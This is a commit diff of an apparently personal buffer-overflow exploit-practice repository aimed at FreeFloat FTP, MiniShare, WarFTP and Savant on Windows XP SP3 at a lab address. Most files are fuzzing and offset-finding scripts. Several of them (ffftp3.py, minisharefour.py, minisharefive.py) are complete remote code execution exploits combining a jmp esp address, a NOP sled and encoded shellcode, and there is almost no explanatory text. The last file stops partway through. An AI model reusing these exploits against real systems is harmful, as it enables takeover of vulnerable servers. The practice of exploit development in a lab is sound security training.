update

README.md

@@ -1 +1,16 @@
 # Buffer-Overflow-Exploit-Development-Practice
+
+
+
+Completed exploits on WinXP SP3:
+-freefloatftp
+-minishare
+-warftp
+
+
+I will explain these when i find the time or motivation
+
+todo:
+-savant
+-other windows 7 sploits
+

freefloatftp/ffftp.py

@@ -0,0 +1,16 @@
+#!/usr/bin/python 
+import socket
+import sys
+
+evil = "A"*1000 
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('11.11.11.6',21))
+s.recv(1024)
+s.send('USER anonymous\r\n')
+s.recv(1024)
+s.send('PASS anonymous\r\n')
+s.recv(1024)
+s.send('MKD ' + evil + '\r\n')
+s.recv(1024)
+s.send('QUIT\r\n')
+s.close

freefloatftp/ffftp2.py

@@ -0,0 +1,16 @@
+#!/usr/bin/python 
+import socket
+import sys
+evil="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('11.11.11.6',21))
+s.recv(1024)
+s.send('USER anonymous\r\n')
+s.recv(1024)
+s.send('PASS anonymous\r\n')
+s.recv(1024)
+s.send('MKD ' + evil + '\r\n')
+s.recv(1024)
+s.send('QUIT\r\n')
+s.close

freefloatftp/ffftp3.py

@@ -0,0 +1,46 @@
+#!/usr/bin/python 
+import socket
+import sys
+shellcode = ("\xfd\x4a\x4a\x90\x98\x27\x4b\x27\xd6\x41\x98\x2f\x49\x43\x9f"
+"\x92\x37\x49\x48\x2f\xd6\x49\xd6\x9b\xfd\xf8\x42\x93\x2f\x90"
+"\xd9\xc2\xd9\x74\x24\xf4\x5e\xb8\x80\x24\x86\x9d\x33\xc9\xb1"
+"\x53\x83\xc6\x04\x31\x46\x13\x03\xc6\x37\x64\x68\x3a\xdf\xea"
+"\x93\xc2\x20\x8b\x1a\x27\x11\x8b\x79\x2c\x02\x3b\x09\x60\xaf"
+"\xb0\x5f\x90\x24\xb4\x77\x97\x8d\x73\xae\x96\x0e\x2f\x92\xb9"
+"\x8c\x32\xc7\x19\xac\xfc\x1a\x58\xe9\xe1\xd7\x08\xa2\x6e\x45"
+"\xbc\xc7\x3b\x56\x37\x9b\xaa\xde\xa4\x6c\xcc\xcf\x7b\xe6\x97"
+"\xcf\x7a\x2b\xac\x59\x64\x28\x89\x10\x1f\x9a\x65\xa3\xc9\xd2"
+"\x86\x08\x34\xdb\x74\x50\x71\xdc\x66\x27\x8b\x1e\x1a\x30\x48"
+"\x5c\xc0\xb5\x4a\xc6\x83\x6e\xb6\xf6\x40\xe8\x3d\xf4\x2d\x7e"
+"\x19\x19\xb3\x53\x12\x25\x38\x52\xf4\xaf\x7a\x71\xd0\xf4\xd9"
+"\x18\x41\x51\x8f\x25\x91\x3a\x70\x80\xda\xd7\x65\xb9\x81\xbf"
+"\x4a\xf0\x39\x40\xc5\x83\x4a\x72\x4a\x38\xc4\x3e\x03\xe6\x13"
+"\x40\x3e\x5e\x8b\xbf\xc1\x9f\x82\x7b\x95\xcf\xbc\xaa\x96\x9b"
+"\x3c\x52\x43\x31\x34\xf5\x3c\x24\xb9\x45\xed\xe8\x11\x2e\xe7"
+"\xe6\x4e\x4e\x08\x2d\xe7\xe7\xf5\xce\x16\xa4\x70\x28\x72\x44"
+"\xd5\xe2\xea\xa6\x02\x3b\x8d\xd9\x60\x13\x39\x91\x62\xa4\x46"
+"\x22\xa1\x82\xd0\xa9\xa6\x16\xc1\xad\xe2\x3e\x96\x3a\x78\xaf"
+"\xd5\xdb\x7d\xfa\x8d\x78\xef\x61\x4d\xf6\x0c\x3e\x1a\x5f\xe2"
+"\x37\xce\x4d\x5d\xee\xec\x8f\x3b\xc9\xb4\x4b\xf8\xd4\x35\x19"
+"\x44\xf3\x25\xe7\x45\xbf\x11\xb7\x13\x69\xcf\x71\xca\xdb\xb9"
+"\x2b\xa1\xb5\x2d\xad\x89\x05\x2b\xb2\xc7\xf3\xd3\x03\xbe\x45"
+"\xec\xac\x56\x42\x95\xd0\xc6\xad\x4c\x51\xf6\xe7\xcc\xf0\x9f"
+"\xa1\x85\x40\xc2\x51\x70\x86\xfb\xd1\x70\x77\xf8\xca\xf1\x72"
+"\x44\x4d\xea\x0e\xd5\x38\x0c\xbc\xd6\x68")
+
+evil = "A"*247 + "\x53\x93\x42\x7e" +shellcode + "C"*(749-len(shellcode))
+#the address of jmp esp is 0x7e429353
+#evil = "A" * 247 + "B"*4 + "C"*749
+#evil="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('11.11.11.6',21))
+s.recv(1024)
+s.send('USER anonymous\r\n')
+s.recv(1024)
+s.send('PASS anonymous\r\n')
+s.recv(1024)
+s.send('MKD ' + evil + '\r\n')
+s.recv(1024)
+s.send('QUIT\r\n')
+s.close

minishare/minisharefive.py

@@ -0,0 +1,41 @@
+#!/usr/share/python
+import socket,sys
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect(('11.11.11.6',80))
+buf="GET "
+buf+="A"*1787
+buf+="\x53\x93\x42\x7e"
+#memory address of jmp esp is 7e429353
+buf+="\x90"*20
+buf+=("\xd9\xe1\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x53\xbf\x48"
+"\x44\xaf\x52\x83\xc6\x04\x31\x7e\x13\x03\x36\x57\x4d"
+"\xa7\x3a\xbf\x13\x48\xc2\x40\x74\xc0\x27\x71\xb4\xb6"
+"\x2c\x22\x04\xbc\x60\xcf\xef\x90\x90\x44\x9d\x3c\x97"
+"\xed\x28\x1b\x96\xee\x01\x5f\xb9\x6c\x58\x8c\x19\x4c"
+"\x93\xc1\x58\x89\xce\x28\x08\x42\x84\x9f\xbc\xe7\xd0"
+"\x23\x37\xbb\xf5\x23\xa4\x0c\xf7\x02\x7b\x06\xae\x84"
+"\x7a\xcb\xda\x8c\x64\x08\xe6\x47\x1f\xfa\x9c\x59\xc9"
+"\x32\x5c\xf5\x34\xfb\xaf\x07\x71\x3c\x50\x72\x8b\x3e"
+"\xed\x85\x48\x3c\x29\x03\x4a\xe6\xba\xb3\xb6\x16\x6e"
+"\x25\x3d\x14\xdb\x21\x19\x39\xda\xe6\x12\x45\x57\x09"
+"\xf4\xcf\x23\x2e\xd0\x94\xf0\x4f\x41\x71\x56\x6f\x91"
+"\xda\x07\xd5\xda\xf7\x5c\x64\x81\x9f\x91\x45\x39\x60"
+"\xbe\xde\x4a\x52\x61\x75\xc4\xde\xea\x53\x13\x20\xc1"
+"\x24\x8b\xdf\xea\x54\x82\x1b\xbe\x04\xbc\x8a\xbf\xce"
+"\x3c\x32\x6a\x7a\x34\x95\xc5\x99\xb9\x65\xb6\x1d\x11"
+"\x0e\xdc\x91\x4e\x2e\xdf\x7b\xe7\xc7\x22\x84\x16\x44"
+"\xaa\x62\x72\x64\xfa\x3d\xea\x46\xd9\xf5\x8d\xb9\x0b"
+"\xae\x39\xf1\x5d\x69\x46\x02\x48\xdd\xd0\x89\x9f\xd9"
+"\xc1\x8d\xb5\x49\x96\x1a\x43\x18\xd5\xbb\x54\x31\x8d"
+"\x58\xc6\xde\x4d\x16\xfb\x48\x1a\x7f\xcd\x80\xce\x6d"
+"\x74\x3b\xec\x6f\xe0\x04\xb4\xab\xd1\x8b\x35\x39\x6d"
+"\xa8\x25\x87\x6e\xf4\x11\x57\x39\xa2\xcf\x11\x93\x04"
+"\xb9\xcb\x48\xcf\x2d\x8d\xa2\xd0\x2b\x92\xee\xa6\xd3"
+"\x23\x47\xff\xec\x8c\x0f\xf7\x95\xf0\xaf\xf8\x4c\xb1"
+"\xc0\xb2\xcc\x90\x48\x1b\x85\xa0\x14\x9c\x70\xe6\x20"
+"\x1f\x70\x97\xd6\x3f\xf1\x92\x93\x87\xea\xee\x8c\x6d"
+"\x0c\x5c\xac\xa7")
+
+buf+=" HTTP/1.1\r\n\r\n"
+s.send(buf)
+s.close()

minishare/minisharefour.py

@@ -0,0 +1,41 @@
+#!/usr/share/python
+import socket,sys
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect(('11.11.11.6',80))
+buf="GET "
+buf+="A"*1787
+buf+="\x53\x93\x42\x7e"
+#memory address of jmp esp is 7e429353
+buf+="\x90"*20
+buf+=("\xd9\xe1\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x53\xbf\x48"
+"\x44\xaf\x52\x83\xc6\x04\x31\x7e\x13\x03\x36\x57\x4d"
+"\xa7\x3a\xbf\x13\x48\xc2\x40\x74\xc0\x27\x71\xb4\xb6"
+"\x2c\x22\x04\xbc\x60\xcf\xef\x90\x90\x44\x9d\x3c\x97"
+"\xed\x28\x1b\x96\xee\x01\x5f\xb9\x6c\x58\x8c\x19\x4c"
+"\x93\xc1\x58\x89\xce\x28\x08\x42\x84\x9f\xbc\xe7\xd0"
+"\x23\x37\xbb\xf5\x23\xa4\x0c\xf7\x02\x7b\x06\xae\x84"
+"\x7a\xcb\xda\x8c\x64\x08\xe6\x47\x1f\xfa\x9c\x59\xc9"
+"\x32\x5c\xf5\x34\xfb\xaf\x07\x71\x3c\x50\x72\x8b\x3e"
+"\xed\x85\x48\x3c\x29\x03\x4a\xe6\xba\xb3\xb6\x16\x6e"
+"\x25\x3d\x14\xdb\x21\x19\x39\xda\xe6\x12\x45\x57\x09"
+"\xf4\xcf\x23\x2e\xd0\x94\xf0\x4f\x41\x71\x56\x6f\x91"
+"\xda\x07\xd5\xda\xf7\x5c\x64\x81\x9f\x91\x45\x39\x60"
+"\xbe\xde\x4a\x52\x61\x75\xc4\xde\xea\x53\x13\x20\xc1"
+"\x24\x8b\xdf\xea\x54\x82\x1b\xbe\x04\xbc\x8a\xbf\xce"
+"\x3c\x32\x6a\x7a\x34\x95\xc5\x99\xb9\x65\xb6\x1d\x11"
+"\x0e\xdc\x91\x4e\x2e\xdf\x7b\xe7\xc7\x22\x84\x16\x44"
+"\xaa\x62\x72\x64\xfa\x3d\xea\x46\xd9\xf5\x8d\xb9\x0b"
+"\xae\x39\xf1\x5d\x69\x46\x02\x48\xdd\xd0\x89\x9f\xd9"
+"\xc1\x8d\xb5\x49\x96\x1a\x43\x18\xd5\xbb\x54\x31\x8d"
+"\x58\xc6\xde\x4d\x16\xfb\x48\x1a\x7f\xcd\x80\xce\x6d"
+"\x74\x3b\xec\x6f\xe0\x04\xb4\xab\xd1\x8b\x35\x39\x6d"
+"\xa8\x25\x87\x6e\xf4\x11\x57\x39\xa2\xcf\x11\x93\x04"
+"\xb9\xcb\x48\xcf\x2d\x8d\xa2\xd0\x2b\x92\xee\xa6\xd3"
+"\x23\x47\xff\xec\x8c\x0f\xf7\x95\xf0\xaf\xf8\x4c\xb1"
+"\xc0\xb2\xcc\x90\x48\x1b\x85\xa0\x14\x9c\x70\xe6\x20"
+"\x1f\x70\x97\xd6\x3f\xf1\x92\x93\x87\xea\xee\x8c\x6d"
+"\x0c\x5c\xac\xa7")
+
+buf+=" HTTP/1.1\r\n\r\n"
+s.send(buf)
+s.close()

minishare/minishareone.py

@@ -0,0 +1,9 @@
+#!/usr/share/python
+import socket,sys
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect(('11.11.11.6',80))
+buff="GET "
+buff+="A"*2000
+buff+=" HTTP/1.1\r\n\r\n"
+s.send(buff)
+s.close()

minishare/minisharethree.py

@@ -0,0 +1,25 @@
+#!/usr/share/python
+import socket,sys
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect(('11.11.11.6',80))
+buff="GET "
+buff+="A"*1787
+buff+="\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
+buff+="\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
+buff+="\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
+buff+="\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
+buff+="\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
+buff+="\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
+buff+="\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
+buff+="\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
+buff+="\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
+buff+="\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
+buff+="\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
+buff+="\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
+buff+="\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
+buff+="\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
+buff+="\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
+buff+="\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
+buff+=" HTTP/1.1\r\n\r\n"
+s.send(buff)
+s.close()

minishare/minisharetwo.py

@@ -0,0 +1,9 @@
+#!/usr/share/python
+import socket,sys
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect(('11.11.11.6',80))
+buff="GET "
+buff+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"
+buff+=" HTTP/1.1\r\n\r\n"
+s.send(buff)
+s.close()

savant/savant1.py

@@ -0,0 +1,15 @@
+#!/usr/bin/python
+import socket
+
+target_address="11.11.11.6"
+target_port=80
+
+badbuffer = "\x41" * 258
+httpmethod = "GET"
+
+sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n'
+
+sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=sock.connect((target_address,target_port))
+sock.send(sendbuf)
+sock.close()

savant/savant2.py

@@ -0,0 +1,15 @@
+#!/usr/bin/python
+import socket
+
+target_address="11.11.11.6"
+target_port=80
+badbuffer = ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5")
+#badbuffer = "\x41" * 258
+httpmethod = "GET"
+#fuck this it requires an egghunter and other shit
+sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n'
+
+sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=sock.connect((target_address,target_port))
+sock.send(sendbuf)
+sock.close()

warftp/ftpexploit.py

@@ -0,0 +1,13 @@
+#!/usr/bin/python
+import socket
+#buffer = "A" * 1100
+buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk"
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('11.11.11.6',21))
+response = s.recv(1024)
+print response
+s.send('USER ' + buffer + '\r\n')
+response = s.recv(1024)
+print response
+s.send('PASS PASSWORD\r\n')
+s.close()

warftp/ftpexploitbreakpoint.py

@@ -0,0 +1,19 @@
+#!/usr/bin/python
+import socket
+buffer = "A" * 485 + "B" * 4 + "C" * 611
+#0x77c35459
+#module to jump to is 0x7C9D30D7
+#address is 00AFFD48
+#eip is at byte 485
+#esp is at byte 493, eight bytes away
+#buffer = "A" * 1100
